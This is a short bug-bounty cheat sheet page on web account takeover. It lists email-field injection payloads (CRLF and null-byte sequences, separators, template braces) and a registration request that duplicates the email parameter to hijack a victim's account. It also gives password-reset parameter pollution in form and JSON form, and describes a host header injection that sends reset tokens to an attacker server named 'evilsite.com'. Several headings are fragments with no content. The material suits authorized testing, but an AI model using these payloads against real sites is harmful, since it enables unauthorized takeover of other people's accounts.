ATO
Through Email Replacing when Registering Account (testing/abuse email filter)
email@email.com,victim@hack.secry
email@email“,”victim@hack.secry
email@email.com:victim@hack.secry
email@email.com%0d%0avictim@hack.secry
%0d%0avictim@hack.secry
%0avictim@hack.secry
victim@hack.secry%0d%0a
victim@hack.secry%0a
victim@hack.secry%0d
victim@hack.secry%00
victim@hack.secry{{}}
Example Request:
name=HACKER&email=HACKER@wearehackerone.com&email=victim@hack.secry&username=hackerz&password=THIS_ISPASSWORD_TO_TAKEOVER&password-confirmation=THIS_ISPASSWORD_TO_TAKEOVER&_csrf_token=XXX7139a5209c08aec2dbff06f5ab5XXXXXXXXXXThrough Parameter Pollution in Reset Password
POST /passwordReset
[…]
email=victim@yahoo.com&email=hacker@yahoo.com
or in JSON:
{“email”:[“andrew@hotmail.com”,”hacker@gmail.com”]}Through OTP Code Bruteforce
Through Host Header Injection
And the victim will receive the reset link email with with “token” will contain “evilsite.com“, so when the user click the link, the “token” will logged/extracted to the evilsite.com server log
Using Separator in Value of the Parameter
Try input No Domain in Value of the Parameter to Account Takeover
Try input No TLD in Email Value of the Parameter
Try Re-Sign up using Same Email
If there is JSON data in requests, add comma and input your hacker email
Last updated
Was this helpful?